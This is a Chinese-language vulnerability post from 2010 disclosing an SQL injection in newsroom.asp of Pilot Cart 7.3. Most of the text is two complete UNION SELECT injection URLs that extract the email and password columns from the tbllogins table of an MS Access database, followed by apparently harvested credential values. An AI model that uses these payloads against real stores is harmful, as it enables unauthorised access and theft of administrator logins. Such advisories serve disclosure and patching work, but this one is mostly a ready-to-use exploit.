ASPilot Pilot Cart 7.3 SQL注入

发布日期：2010-11.12
发布作者：Daikin

影响版本：Pilot Cart V.7.3
官方地址：http://www.pilotcart.com

漏洞类型：SQL注入
漏洞描述：Pilot Cart V.7.3程序未进行严格过滤，newsroom.asp请求未对参数过滤就直接带入SQL查询产生注入漏洞。
 

http://server/newsroom.asp?specific=1

DB: MSAccess

http://server/newsroom.asp?specific=-1%20UNION%20ALL%20SELECT%20null,(select%20top%201%20chr(126)%2bchr(39)%2bcstr(email)%2bchr(39)%2bchr(126)%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20tbllogins%20order%20by%201)%20t%20order%20by%201%20desc)t),null,null,null,null,null%20from%20tbllogins

-->mail field "scarab"

http://server/newsroom.asp?specific=-1%20UNION%20ALL%20SELECT%20null,(select%20top%201%20chr(126)%2bchr(39)%2bcstr(pword)%2bchr(39)%2bchr(126)%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20tbllogins%20order%20by%201)%20t%20order%20by%201%20desc)t),null,null,null,null,null%20from%20tbllogins

-->pass field "R1ckr011"
 

标签分类： SQL注入